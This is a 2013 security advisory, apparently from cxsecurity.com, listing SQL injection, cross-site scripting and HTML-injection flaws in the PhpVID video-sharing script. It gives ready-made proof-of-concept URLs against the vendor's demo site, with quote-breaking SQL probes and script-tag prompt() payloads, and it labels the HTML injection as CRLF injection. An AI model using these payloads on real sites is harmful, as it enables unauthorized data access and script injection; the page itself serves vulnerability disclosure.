PhpVID Script Multiple Vulnerabilities

2013-08-08 / 2013-08-22
Credit: spi0n
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

################################################################################## _____ _ _ _ _____ | __ \ | | | | (_) / ____| | |__) |_____ _____ | |_ _| |_ _ ___ _ __ | (___ ___ ___ | _ // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \ \___ \ / _ \/ __| | | \ \ __/\ V / (_) | | |_| | |_| | (_) | | | | ____) | __/ (__ |_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___| ################################################################################## PhpVID Script, Multiple Vulnerabilities Product Page: http://www.vastal.com/phpvid-the-video-sharing-software.html Script Demo: http://www.phpvid.com Author(Pentester): 3spi0n On Web: RevolutionSec.Com - GraySecure.Org On Social: Twitter.Com/eyyamgudeer ################################################################################## [1] SQL Injection Vulnerabilities on Demo Site [+] (browse_videos.php, n Param) >>> http://www.phpvid.com//browse_videos.php?cat=&n='1 [+] (groups.php, cat Param) >>> http://www.phpvid.com/groups.php?cat='1 [+] (members.php, n Param) >>> http://www.phpvid.com/members.php?browse=recent&n='1 [2] XSS Vulnerability on Demo Site [+] (browse_videos.php, n Param) >>> http://phpvid.com/browse_videos.php?cat=&n=1'<ScRiPt >prompt(959580)</ScRiPt> [+] (groups.php, cat Param) >>> http://phpvid.com//groups.php?cat=1'<ScRiPt >prompt(987925)</ScRiPt> [+] (search_results.php.php, query Param) >>> http://phpvid.com//search_results.php?query=<ScRiPt >prompt(931776)</ScRiPt> [3] CRLF Injection Vulnerability on Demo Site >>> http://phpvid.com/search_results.php?query=<marquee><h1>come to dance! <br>by, 3spi0n</h1></marquee>

Referencje:

http://www.vastal.com/phpvid-the-video-sharing-software.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top